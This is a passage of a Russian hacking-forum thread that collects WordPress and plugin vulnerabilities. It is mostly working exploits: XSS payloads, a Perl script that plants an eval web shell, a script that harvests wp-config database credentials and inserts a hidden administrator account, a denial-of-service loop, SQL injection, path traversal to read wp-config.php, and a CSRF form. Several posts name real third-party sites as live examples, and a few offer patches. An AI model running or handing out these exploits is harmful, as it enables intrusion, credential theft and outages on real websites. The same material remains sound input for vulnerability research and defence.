[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln

    http://wordpress.org/extend/plugins/advanced-twitter-widget/
    \advanced-twitter-widget.php

    (c)eLwaux 30.06.2009, uasc.org.ua

    PHP:
    89:  if($_POST['advanced_twitter_widget_value']!=""){
    90:              $xArrOptions[0]=  $_POST['advanced_twitter_widget_title'];
    91:              $xArrOptions[1]=  $_POST['advanced_twitter_widget_value'];
    92:              $xArrOptions[2]=  $_POST['advanced_twitter_widget_type'];
    93:              $xArrOptions[3]=  $_POST['advanced_twitter_widget_count'];
    94:              update_option('advanced_twitter_widget_options', serialize($xArrOptions));
    95:  }
    97:          $xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
    101:            $xTitle = $xArrOptions[0];
    102:            $xValue = $xArrOptions[1];
    103:            $xType =  $xArrOptions[2];
    104:            $xCount = $xArrOptions[3];
    111:           Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
    112:           Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>
    exploit:
    Code:
    	POST: advanced_twitter_widget_value=">{XSS1}<a "
    	POST: advanced_twitter_widget_title=">{XSS2}<a "
    	POST: advanced_twitter_widget_type=.
    	POST: advanced_twitter_widget_count=.
     
    1 person likes this.
  2. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    WordPress Plugin ImHuman 0.0.9 XSS Vuln

    http://wordpress.org/extend/plugins/imhuman-a-humanized-captcha/
    \imhuman.php

    (c)eLwaux 30.06.2009, uasc.org.ua

    PHP:
    151:    if(isset( $_POST['do'] )) {
    152:        if ( function_exists('current_user_can') && !current_user_can('manage_options') )
    153:            die(__('Cheatin’ uh?'));
    154:        check_admin_referer($plugin_page);
    155:        
    156:        $t['imhuman_api_user'] = $_POST['imhuman_api_user'];
    157:        $t['imhuman_api_key'] = $_POST['imhuman_api_key'];
    158:        $t['imhuman_row'] = $_POST['imhuman_row'];
    159:        $t['imhuman_col'] = $_POST['imhuman_col'];
    160:        $t['imhuman_sel'] = $_POST['imhuman_sel'];
    161:        $t['imhuman_exc'] = isset($_POST['imhuman_exc'] ) ? 1 : 0;
    162:        $t['imhuman_word'] = $_POST['imhuman_word'];
    163:        $t['imhuman_lang'] = $_POST['imhuman_lang'];
    164:        update_option( 'imhuman_options', $t );
    165:        $m = '<p>Settings Saved!</p>';
    166:    }
    167:    $options = get_option( 'imhuman_options' );
    ....
    194:    <td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td>
    195:    </tr>
    196:    <tr>
    197:        <th><?php _e('ImHuman Ap? Key'); ?></th>
    198:        <td><input type="text" name="imhuman_api_key" id="imhuman_api_key" value="<?php echo $options['imhuman_api_key']; ?>" /></td>
    exploit:
    Code:
    	POST: do=.
    	POST: imhuman_api_user=">{XSS1}<a "
    	POST: imhuman_api_key=">{XSS1}<a "
    	POST: imhuman_row=.
    	POST: imhuman_col=.
    	POST: imhuman_sel=.
    	POST: imhuman_word=.
    POST: imhuman_lang=.
     
  3. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
     
  4. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
     
    1 person likes this.
  5. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
    Code:
    WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
    http://wordpress.org/extend/plugins/wordpress-toolbar/
    http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/
    
    Dork: "inurl:wp-toolbar.php"
    
    ## ## ## ##
    
    eLwaux(c)2009 UASC.org.ua
    
    ## ## ## ##
    
    Path Disclosure
    
    /wp-content/plugins/wordpress-toolbar/wp-toolbar.php
    ( call to undefined function add_action() )
    -----------------------------------------------------------------
    1:  <?php
    12: include_once("socialsites.php");
    14: add_action('admin_menu','wordpress_toolbar_admin');
    -----------------------------------------------------------------
    
    example:
     http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
     http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
     http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
     http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
    
    
    ## ## ## ##
    
    XSS
    
    /wp-content/plugins/wordpress-toolbar/toolbar.php
    -----------------------------------------------------------------
    30:    $tourl = $_GET['wp-toolbar-tourl'];
    42:    $blogtitle = $_GET['wp-toolbar-blogtitle'];
    52:       <title><?php echo $blogtitle; ?> - Toolbar</title>
    56:       <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>"
    -----------------------------------------------------------------
    
    PoC: 
     wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS}
     wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id="
    
    example:
     http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
     http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
     http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="
     
  6. devscripts

    devscripts Elder - Старейшина

    Joined:
    8 May 2007
    Messages:
    131
    Likes Received:
    182
    Reputations:
    134
    такое не стоит публиковать, ибо это практически в каждом плагине и инклуд файле вордпресса ;D
     
    1 person likes this.
  7. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
    надо логин:пароль админа :D

    Code:
    Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
    ------------
    http://wordpress.org/extend/plugins/add-uroksu-catalog/
    Add UROK.su Catalog
    Version: 1.03
    ------------
    
    \wp-content\plugins\add-uroksu-catalog\urok.su.class.php
    ----------------------------------------------------------------------
    |56|  if (isset($_POST['UPDATE'])) {
    |57|     MyUROKsu_user=$_REQUEST['login'];
    |58|     $file_name=$file_name=dirname(__FILE__).'/login.txt';
    |59|     $w=fopen($file_name,'w');
    |60|     fwrite($w,$MyUROKsu_user);
    |61|     fclose($w);
    |62|     print($this->update_catalog($MyUROKsu_user));
    |63|     echo '</p>';
    |64|  }
    ----------------------------------------------------------------------
    
    Steps to code execution:
    1) /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php
       POST: UPDATE=.& login=<?php=@eval($_GET['c']);?>
       (your code will be saved to file:
        /wp-content/plugins/add-uroksu-catalog/login.txt)
    2) include this file & code execute:
       /wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=system('id');
    
    perl exploit:
    ----------------------------------------------------------------------
    PHP:
        #! /usr/bin/perl -w

        use LWP::UserAgent;
        use warnings;

        print "\n  WP ] add-uroksu-catalog < 1.03 [ exploit\n";
        print "  eLwaux(c)uasc 2009\n\n";

        if (!$ARGV[2]) {
            print "  usage:\n".
                  "     expl.pl http://site.com/wp/index.php adminLogin adminPass\n".
            exit(0);
        }

        my $mHost = $ARGV[0];
        my $mAdmL = $ARGV[1];
        my $mAdmP = $ARGV[2];

        #$mAdmL =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
        #$mAdmP =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;

        my $HOST = $1 if ($mHost =~ /http:\/\/(.+?)\//);

        my $UA = LWP::UserAgent->new;
        $UA->timeout(20);
        $UA->default_header('Referer' => $mHost.'wp-login.php');
        $UA->default_header('Cookie' => 'wordpress_test_cookie=WP+Cookie+check;');
             
        # login to WP
        my $page = $UA->post($mHost.'wp-login.php',
                       {
                             log         =>  $mAdmL,
                             pwd         =>  $mAdmP,
                            # rememberme  =>  'forever',
                             submit      =>  'Войти',
                             redirect_to =>  $mHost.'wp-admin/',
                             testcookie  =>  1
                       }
                   )->as_string;
        my $cookie = '';
        my @SetCookie = ($page =~ m/Set-Cookie: (.+?=.+?);/g);
        foreach my $SC (@SetCookie) {
             $cookie .= $SC.';';
        }
        if (length($cookie)<100) {
             print '  -   bad login:password!';
             exit(0);
        }
        print '  -   good login:password!'."\n";
        $UA->default_header('Cookie' => $cookie);


        print ' ..   sending exploit..'."\n";
        # send EXPLOIT
        $page = $UA->post($mHost.'wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php',
                       {
                             login       =>  '<?php @eval($_GET[\'c\']);?>',
                             
    UPDATE      =>  1
                       
    }
                   )->
    as_string;
        print 
    '  +   exploit send!'."\n";

        
    # try execute simple code
        
    $page $UA->get($mHost.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r($_SERVER);')->as_string;
        if (
    $page =~ /\[SERVER_SOFTWARE\] => (.+?)[\r\n]+/) {
             print 
    '  +   result of test1: '.$1."\n";
             print 
    '  +   result of test2: '.$1."\n" if ($page =~ /\[SCRIPT_FILENAME\] => (.+?)[\r\n]+/);
        } else {
             print 
    '  -   perhaps code is not injected!'."\n";
        }

        print 
    '  !   FINISH!'."\n\n";
        print 
    ' !!   your shell:'."\n";
        print 
    '      '.$mHost."\n".
              
    '      '.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}'."\n";

        exit(
    0);
    Code:
    ----------------------------------------------------------------------
    
    
    
    simple result on localhost:
    ----------------------------------------------------------------------
    > expl.pl http://localhost/cms/wordpress/ admin "4#@!v^w!*)kW"
    
      WP ] add-uroksu-catalog < 1.03 [ exploit
      eLwaux(c)uasc 2009
    
      -   good login:password!
     ..   sending exploit..
      +   exploit send!
      +   result of test1: Apache/2.2.11 (Win32) PHP/5.2.9-2
      +   result of test2: C:/wamp/www/cms/wordpress/wp-admin/admin.php
      !   FINISH!
    
     !!   your shell:
          http://localhost/cms/wordpress/
          wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}
    ----------------------------------------------------------------------
     
    #127 eLWAux, 15 Jul 2009
    Last edited: 15 Jul 2009
    1 person likes this.
  8. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    XSS [Все версии]
    Сегодня было опубликована ксс, работает вплоть до текущей версии включительно.

    Code:
    http://www.site.com’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);
    Для устранения в файле wp-comments-post.php ~40 строку изменяем:
    Code:
    $comment_author_url = str_replace(chr(39),”,$comment_author_url);
    $comment_author_url = str_replace(chr(59),”,$comment_author_url);
    $comment_author_url = str_replace(chr(44),”,$comment_author_url);
     
    #128 [underwater], 22 Jul 2009
    Last edited: 22 Jul 2009
  9. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Wordpress 2.8.1 (url) Remote Cross Site Scripting Exploit

    This can be used to hack 2.8.1 through Remote XSS.

    Code:
    echo "wp281.quickprz // iso^kpsbr"
    
    SITE=$1
    COMMENT=$2
    MESSAGE="h4x0riZed by the superfreakaz0rz"
    
    if [ "X$SITE" = "X" ]; then
    	echo "$0 <url> [postID]"
    	echo "f.e. $0 www.worstpress.eu"
    	exit
    fi
    
    if [ "X$POSTID" = "X" ]; then
    	POSTID=1
    fi
    
    
    echo "[+] building payload"
    
    WHERE="title" # can also be 'content'
    PATH="$SITE/wp-comments-post.php"
    
    WHERE=`echo -n "$WHERE" | /usr/bin/od -t d1 -A n | /bin/sed 's/\\s\\s*/,/g' | /bin/sed 's/^,//'`
    EVILURL="http://w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();"
    echo "[-] payload is $EVILURL for '$MESSAGE'"
    
    EVILURL=`echo -n "$EVILURL" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
    MESSAGE=`echo -n "$MESSAGE" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
    RNDDATA=`/bin/date +%S%s`;
    
    echo "[!] delivering data"
    /usr/bin/curl -A "Quickprz" -d "author=$MESSAGE&[email protected]&url=$EVILURL&comment=hi+there%5F+this+is+just+some+very+harmless+spam+$RNDDATA&submit=Submit+Comment&comment_post_ID=$POSTID" $PATH
    
    echo "[X] all done. now wait for admin to mouse-over that name."
    
    # milw0rm.com [2009-07-24]
     
  10. fairy_long_nose

    fairy_long_nose New Member

    Joined:
    30 Apr 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    -1
    Не работает
     
  11. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    WP-Config Discover
    Code:
       1.
          < ?php
       2.
          $paths = array(
       3.
              "blog",
       4.
              "site",
       5.
              "html",
       6.
              "www",
       7.
              "html/blog",
       8.
              "www/blog",
       9.
              "site/blog",
      10.
              "wordpress",
      11.
              "wp",
      12.
              "www/wp",
      13.
              "www/wordpress",
      14.
              "html/wordpress",
      15.
              "html/wp",
      16.
              "public_html",
      17.
              "public_html/blog",
      18.
              "public_html/wp",
      19.
              "public_html/wordpress",
      20.
          );
      21.
          $files = array(
      22.
              "wp-config.php",
      23.
          );
      24.
          print "Checking for ….\n";
      25.
          if(!is_readable("/etc/passwd"))    die("err0r: can’t read /etc/passwd (safe mode?)");
      26.
          $_f = @file("/etc/passwd");
      27.
          foreach($_f as $usr){
      28.
              $usr = explode(":", $usr);
      29.
              $uid = $usr[2];
      30.
              $home = $usr[5];
      31.
              $usr = $usr[0];
      32.
              if($uid >= 1000){
      33.
                  print $usr." (uid:".$uid."): ".$home."\n";
      34.
                  foreach($paths as $path){
      35.
                      if(file_exists($home."/".$path)) {
      36.
                      print "\tSearching in ".$home."/".$path."\n";
      37.
                          foreach($files as $file){
      38.
                              if(file_exists($home."/".$path."/".$file)){
      39.
                                   print "\t\tFound: ".$file."\n";
      40.
                                  $__f = @file($home."/".$path."/".$file);
      41.
                                  foreach($__f as $line){
      42.
                                      if(stristr($line, "DB_USER")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output); print "\t\t\t".str_replace("DB_USER’, ","usr=>", $output[1][0])."\n"; }
      43.
                                      if(stristr($line, "DB_PASSWORD")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output2); print "\t\t\t".str_replace("DB_PASSWORD’, ", "pwd=>", $output2[1][0])."\n"; }
      44.
                                      if(stristr($line, "DB_NAME")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output3); print "\t\t\t".str_replace("DB_NAME’, ", "db=>", $output3[1][0])."\n"; }
      45.
                                      if(stristr($line, "DB_HOST")) { preg_match_all(‘/define\(\’(.*)\);/’, $line, $output4); print "\t\t\t".str_replace("DB_HOST’, ", "host=>", $output4[1][0])."\n"; }
      46.
                                      if(stristr($line, "\$table_prefix")) { preg_match_all(‘/\$table_prefix(.*);/’, $line, $output5); print "\t\t\tprefix".$output5[1][0]."\n"; }
      47.
                                      flush();
      48.
                                  }
      49.
                                  print "\t\t\tURL: ".getURL($output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
      50.
                                  if($_GET[‘attack’] == "create_user") print "\t\t\tUser/pass created: ".UserAdmin("create", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
      51.
                                  if($_GET[‘attack’] == "delete_user") print "\t\t\tfakeadmin deleted: ".UserAdmin("delete", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
      52.
                                  flush();
      53.
                              }
      54.
                          }
      55.
                      }
      56.
                      flush();
      57.
                  }
      58.
                  flush();
      59.
              }
      60.
          }
      61.
          function getURL($user, $pass, $db, $host, $prefix){
      62.
              preg_match_all(‘/, \’(.*)\’/’, $user, $user); $user = $user[1][0];
      63.
              preg_match_all(‘/, \’(.*)\’/’, $pass, $pass); $pass = $pass[1][0];
      64.
              preg_match_all(‘/, \’(.*)\’/’, $db, $db); $db = $db[1][0];
      65.
              preg_match_all(‘/, \’(.*)\’/’, $host, $host); $host = $host[1][0];
      66.
              preg_match_all(‘/\’(.*)\’/’, $prefix, $prefix); $prefix = $prefix[1][0];
      67.
              $sql = @mysql_connect($host, $user, $pass);
      68.
              @mysql_select_db($db);
      69.
              $_q = @mysql_query("SELECT option_value FROM ".$prefix."options WHERE option_name=’siteurl’", $sql);
      70.
              @mysql_close($sql);
      71.
              return @mysql_result($_q, 0, ‘option_value’);
      72.
          }
      73.
           
      74.
          function UserAdmin($action, $user, $pass, $db, $host, $prefix){
      75.
                  preg_match_all(‘/, \’(.*)\’/’, $user, $user); $user = $user[1][0];
      76.
                  preg_match_all(‘/, \’(.*)\’/’, $pass, $pass); $pass = $pass[1][0];
      77.
                  preg_match_all(‘/, \’(.*)\’/’, $db, $db); $db = $db[1][0];
      78.
                  preg_match_all(‘/, \’(.*)\’/’, $host, $host); $host = $host[1][0];
      79.
                  preg_match_all(‘/\’(.*)\’/’, $prefix, $prefix); $prefix = $prefix[1][0];
      80.
                  $sql = @mysql_connect($host, $user, $pass);
      81.
                  @mysql_select_db($db);
      82.
              if($action == "create"){
      83.
                  $wp_uid = rand(9990,99999);
      84.
                  @mysql_query("INSERT INTO ".$prefix."users(id, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES(".$wp_uid.", ‘fakeadmin’, md5(’dummie’), ‘wordpress’, ‘[email protected]’, ‘http://’, NOW(), ”, 0, ‘wordpressdummieadmin’)", $sql);
      85.
                  @mysql_query("INSERT INTO ".$prefix."usermeta (user_id, meta_key, meta_value) VALUES (".$wp_uid.", ‘wp_capabilities’, ‘a:1:{s:13:\"administrator\";b:1;}’ )", $sql);
      86.
              }
      87.
              if($action == "delete"){
      88.
                  mysql_query("DELETE FROM ".$prefix."usermeta WHERE user_id=(SELECT id FROM ".$prefix."users WHERE user_login=’fakeadmin’)", $sql);
      89.
                  mysql_query("DELETE FROM ".$prefix."users WHERE user_login=’fakeadmin’", $sql);
      90.
              }
      91.
              @mysql_close($sql);
      92.
              return "fakeadmin/dummie";
      93.
          }
      94.
          ?>
    
    
     
    3 people like this.
  12. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Серьезная быра была обнаружена в файле WP-trackbacks.php. Уязвимость состоит в том, что любой посетитель буквально 20 запросами может положить сайт.

    Открываем файл WP-trackbacks.php:
    Code:
    if ( function_exists(’mb_convert_encoding’) ) { // For international trackbacks
    $title     = mb_convert_encoding($title, get_option(’blog_charset’), $charset);
    $excerpt   = mb_convert_encoding($excerpt, get_option(’blog_charset’), $charset);
    $blog_name = mb_convert_encoding($blog_name, get_option(’blog_charset’), $charset);
    }
    $charset передается через $_POST['charset']. И вя проблема состоит в кодировке mb_convert_encoding

    Code:
    $text = mb_convert_encoding($text,’UTF-8′,’UTF-7,ISO-8859-1′);
    Эта функция преобразует $text в UTF-8. Но если мы сделаем так:
    Code:
    $text = mb_convert_encoding($text,’UTF-8′,’ISO-8859-1,ISO-8859-1,ISO-8859-1,ISO-8859-1′);
    mb_convert_encoding попытает определить кодировку $text, и будет проверять является ли она ISO-8859-1, и так снова и снова. Эскплоит уже придумали до меня:
    Code:
        <?php
        //wordpress Resource exhaustion Exploit
        // by rooibo
        //[email protected] contacted and get a response,
        //but no solution available.
        if(count($argv) < 2) {
        echo “You need to specify a url to attack\n”;
        exit;
        }
    
        $url = $argv[1];
    
        $data = parse_url($url);
        if(count($data) < 2) {
        echo “The url should have http:// in front of it, and should be complete.\n”;
        exit;
        }
    
        if(count($data) == 2) {
        $path = ”;
        } else {
        $path = $data['path'];
        }
        $path = trim($path,’/');
        $path .= ‘/wp-trackback.php’;
        if($path{0} != ‘/’) {
        $path = ‘/’.$path;
        }
    
        $b = “”;
        $b = str_pad($b,140000,’ABCEDFG’);
        $b = utf8_encode($b);
        $charset = “”;
        $charset = str_pad($charset,140000,”UTF-8,”);
    
        $str = ‘charset=’.urlencode($charset);
        $str .= ‘&url=www.example.com’;
        $str .= ‘&title=’.$b;
        $str .= ‘&blog_name=lol’;
        $str .= ‘&excerpt=lol’;
    
        $count = 0;
        while(1) {
        $fp = @fsockopen($data['host'],80);
        if(!$fp) {
        if($count > 0) {
        echo “down!!!!\n”;
        exit;
        }
        echo “unable to connect to: “.$data['host'].”\n”;
        exit;
        }
    
        fputs($fp, “POST $path HTTP/1.1\r\n”);
        fputs($fp, “Host: “.$data['host'].”\r\n”);
        fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);
        fputs($fp, “Content-length: “.strlen($str).”\r\n”);
        fputs($fp, “Connection: close\r\n\r\n”);
        fputs($fp, $str.”\r\n\r\n”);
    
        echo “hit!\n”;
        $count++;
        }
    
        ?>
    Запускаем так: php exploit.php http://site.com

    Для патчинга открываем файл WP-trackbacks.php, ищем строку:
    Code:
    $charset = $_POST['charset'];
    Заменяем на:
    Code:
    $charset = str_replace(”,”,”",$_POST['charset']);
    if(is_array($charset)) { exit; }
     
    1 person likes this.
  13. Techn0id

    Techn0id New Member

    Joined:
    5 Dec 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    WordPress Google Analytics Plugin 3.x

    WordPress Google Analytics Plugin 3.x
    Code:
    http://localhost/wp/?s=</script><script>alert(0)</script>
    http://localhost/wp/?s=");alert(0);document.write("
     
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Раскрытие пути плагина cforms да по сути что не зайди там на файл, то раскрытие

    файл: cforms-captcha.php
    PHP:
    $im_bg_url'captchabg/' . ( prep($_REQUEST['b'],'1.gif') );
    /////ну и косячная функция getimagesize
    $image_data=getimagesize($im_bg_url); 
    пример : http://www.sakeservices.com/wp-content/plugins/cforms/cforms-captcha.php?b=1'
     
    _________________________
    2 people like this.
  15. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    плагин xcloner

    phpinfo()

    файл /restore/XCloner.php

    PHP:
    switch ($_REQUEST[task]) {



      case 
    'step2':

         
    step2();

         break;

      case 
    'step1':

         
    step1();

         break;

      case 
    'getinfo':

         
    getPHPINFO();

         break;

      case 
    'info':

         echo 
    phpinfo();

         break;

      default :

         
    start();

         break;

      }

    __http://www.hellboysword.com/wp-content/plugins/xcloner/restore/XCloner.php?task=info
     
    _________________________
    #135 HAXTA4OK, 21 Dec 2009
    Last edited: 21 Dec 2009
    1 person likes this.
  16. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    плагин nsx-referers

    плагин nsx-referers

    /wp-content/plugins/nsx-referers/nsx-referers-stat.php

    PHP:
    .......

    $referer $_SERVER['HTTP_REFERER'];
    $ref_arr parse_url("$referer");

    .......

    $res_query urldecode($ref_arr['query']);
    if (
    preg_match("/{$hosts[$host]}(.*?)&/si",$res_query."&",$matches))
    {
      
    $search $matches[1];
    }

    if (
    $wpdb->rows_affected 1)
        
    $wpdb->query"INSERT INTO ".REFTABLE." VALUES ('', '$url', 'NULL', 'NULL', '$search', 1)");

    в Referer отсылаем http://yandex.ru/yandsearch?text=wp%27,1),(0x00,0x2f,0x00,0x00,user(),1)%23&lr=6
     
    6 people like this.
  17. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://www.milw0rm.com/exploits/3095

    страшный боян
     
  18. total90

    total90 Elder - Старейшина

    Joined:
    30 Sep 2009
    Messages:
    90
    Likes Received:
    85
    Reputations:
    12
    WordPress - Amcaptcha plugin ( amcaptcha.php ) <= 1.5 CSRF

    Ошибка в коде в функции:

    PHP:
    function comment_post ($id){
        global 
    $user_ID;
        global 
    $langs;
        
        
    $texts $langs[get_option('ac_lang')];
        
        if (
    $user_ID)
            return 
    $id;

        if (
    $_POST[$_SESSION['amcaptcha_session']] != '1'){
            
    wp_delete_comment($id);
            echo
    "<strong>".$texts['error']."</strong><br/><br/>".$_POST['comment'];
            exit;
        }
    }
    а точнее:

    PHP:
    if ($_POST[$_SESSION['amcaptcha_session']] != '1'){
        
    wp_delete_comment($id);
        echo
    "<strong>".$texts['error']."</strong><br/><br/>".$_POST['comment'];
        exit;
    }
    если чел не передал сессию этого модуля ( а точнее не отметил чекбокс --
    "Подтверждаю, что я не спам-бот" ) то модуль выдает ошибку и при этом не
    фильтрует $_POST['comment'].

    Сам сплойт выглядит так :
    Code:
    <html>
    <head>
    <title>WordPress - Amcaptcha plugin ( amcaptcha.php ) <= 1.5 CSRF
    Exploit</title>
    <!--
    Vulnerability found by total90, exploit written by Dr.TRO
    -->
    </head>
    <body>
    <form action="http://[Домен][Путь к WP]wp-comments-post.php" method="post"
    name="commentform">
    <input type="hidden" name="author" value="Dr.TRO" />
    <input type="hidden" name="email" value="[email protected]" />
    <input type="hidden" name="comment" value="[Уязвимое место]" />
    <input type="hidden" name="comment_post_ID" value="[ID существующего
    поста]" />
    <input type="submit" name="submit" value="Request" />
    </form>
    </body>
    </html>
    
    Анализ кода и сплойт by Dr.TRO
    Google dork: Для того, чтобы иметь возможность комментировать, включите
    JavaScript в Вашем браузере.
     
    #138 total90, 4 Apr 2010
    Last edited: 5 Apr 2010
    5 people like this.
  19. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    WordPress Plugin [jRSS Widget] File Disclosure Vulnerability

    Plugin name: jRSS Widget (download)
    Version: 1.0

    File Disclosure

    Vuln file: /wp-content/plugins/jrss-widget/proxy.php
    PHP:
    header('Content-type: application/xml');
    $handle fopen($_REQUEST['url'], "r");

    if ( 
    $handle ) {
        while ( !
    feof($handle) ) {
            
    $buffer fgets($handle4096);
            echo 
    $buffer;
        }
        
    fclose($handle);
    }
    Exploit:
    Code:
    POST http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
    Content-type: application/x-www-form-urlencoded
    
    url=[COLOR=White]../../../wp-config.php[/COLOR]
     
    #139 RulleR, 30 May 2010
    Last edited: 30 May 2010
    2 people like this.
  20. total90

    total90 Elder - Старейшина

    Joined:
    30 Sep 2009
    Messages:
    90
    Likes Received:
    85
    Reputations:
    12
    Wordpress 2.9.2 Passive XSS

    Search.php

    Сразу оговорюсь, данная уязвимость присутствует не во всех wp-темах.

    Рассмотрим тему Simple Balance

    search.php:
    PHP:
    <?php include (TEMPLATEPATH '/header.php'); ?>

        <div id="page">

            <?php
            
    if (!isset($theme_options["layout_style"]) || $theme_options["layout_style"] == "scs") {
                include (
    TEMPLATEPATH '/lsidebar.php');
            }
            
    ?>

            <div id="content">

                <?php include (TEMPLATEPATH '/topads.php'); ?>

                <h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>

            <?php if (have_posts()) : ?>
                <?php while (have_posts()) : the_post(); ?>
                <div class="post">
                    <div class="postTitle"><h2><a href="<?php the_permalink() ?>" rel="bookmark" title="<?php the_title(); ?>"><?php the_title(); ?></a></h2></div>
                    <div class="postInfo">Опубликовано <?php the_time('d.m.Y'); ?> в рубрике <?php the_category(', '?> <?php edit_post_link('изменить''('')'); ?></div>

                    <div class="postContent">
                    <?php the_excerpt(); ?>
                    </div>

                    <?php if(function_exists('the_tags')) { ?><div class="postExtras"><strong>Метки:</strong> <?php the_tags(''', '''); ?></div><?php ?>
                    
                    <div class="postMeta">
                        <span class="postLink"><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>">Читать пост</a></span>
                        <?php
                        $comNo 
    get_comment_type_count('comment'); // Checking if there are any actual comments (trackbacks and pingbacks excluded)

                        
    if ($comNo == ) {
                        
    ?>
                        <span class="postComments"><?php comments_popup_link('Прокомментируете?''Один комментарий''Комментариев '.$comNo.''); ?></span>
                        <?php }
                        elseif (
    $comNo 1) {
                        
    ?>
                        <span class="postComments"><?php comments_popup_link('Прокомментируете?''Один комментарий''Комментариев '.$comNo.''); ?></span>
                        <?php }
                        else {
                        
    ?>
                        <span class="postComments"><?php comments_popup_link('Прокомментируете?''Прокомментируете?''Прокомментируете?'); ?></span>
                        <?php ?>
                    </div>
                </div>
                <?php endwhile; ?>

                <div class="navigation">
                    <div class="left"><?php previous_posts_link('&laquo; В будущее'?></div>                
                    <div class="right"><?php next_posts_link('В прошлое &raquo;'?></div>
                </div>

                <?php else: ?>
                Ничего не найдено.<br />
